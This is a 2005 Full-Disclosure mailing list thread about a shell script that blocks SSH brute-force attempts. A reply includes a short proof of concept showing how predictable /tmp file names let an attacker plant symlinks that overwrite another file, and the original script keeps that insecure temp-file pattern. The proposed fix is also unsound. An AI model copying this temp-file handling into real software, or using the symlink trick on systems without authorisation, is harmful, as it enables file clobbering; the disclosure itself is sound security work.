Ok, well spotted. Something for me to fix there.
Here you go, add these lines to the script just after the touch: chmod 700 ${TMP_FILE} > ${TMP_FILE} My apologies, that is a no-no and something I should have spotted. I originally thought about doing this with arrays in memory. I might go back to that later. Thanks for your input. Cheers, Mike. -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alejandro Barrera Sent: Friday, September 02, 2005 04:04 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] SSH Bruteforce blocking script Well, we apreciate your script although I would preffer to stay with my nice bruteforcing attempts than to create an insecure temporary file bug: [EMAIL PROTECTED]:~$ cat test.sh #!/bin/sh SCRIPT_NAME=$(basename $0) TMP_FILE="/tmp/${SCRIPT_NAME}.$$" touch ${TMP_FILE} echo "pwn3d" > ${TMP_FILE} exit [EMAIL PROTECTED]:~$ cat data pr0n g0ld collection: .... [EMAIL PROTECTED]:~$ ln -s /home/ergosum/data /tmp/test.sh.18359 [EMAIL PROTECTED]:~$ ln -s /home/ergosum/data /tmp/test.sh.18361 [EMAIL PROTECTED]:~$ ln -s /home/ergosum/data /tmp/test.sh.18362 [EMAIL PROTECTED]:~$ ./test.sh [EMAIL PROTECTED]:~$ cat data pwn3d > #!/bin/ksh > # > # ssh_brute_blocker > # > # 05/07/2004 15:05 - Michael L. Benjamin # > SCRIPT_NAME=$(basename $0) > LOG_FILE="/var/log/secure" > DENY_FILE="/etc/hosts.deny" > TMP_FILE="/tmp/${SCRIPT_NAME}.$$" > INBOUND_IP="" > INLINE="" > GUESS_COUNT=0 > PERMIT_GUESS=4 > touch ${TMP_FILE} > while : > do > tail -10000 ${LOG_FILE} | grep "Failed password for illegal user" | > awk -F"from" {'print $2'} | awk {'print $1'} | uniq > ${TMP_FILE} -- Alejandro Barrera GarcĂa-Orea R&D Engineer c/ Alcala 268 28027 Madrid Office: +34 91 326 66 11 Fax: +34 91 326 66 11 e-mail: [EMAIL PROTECTED] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/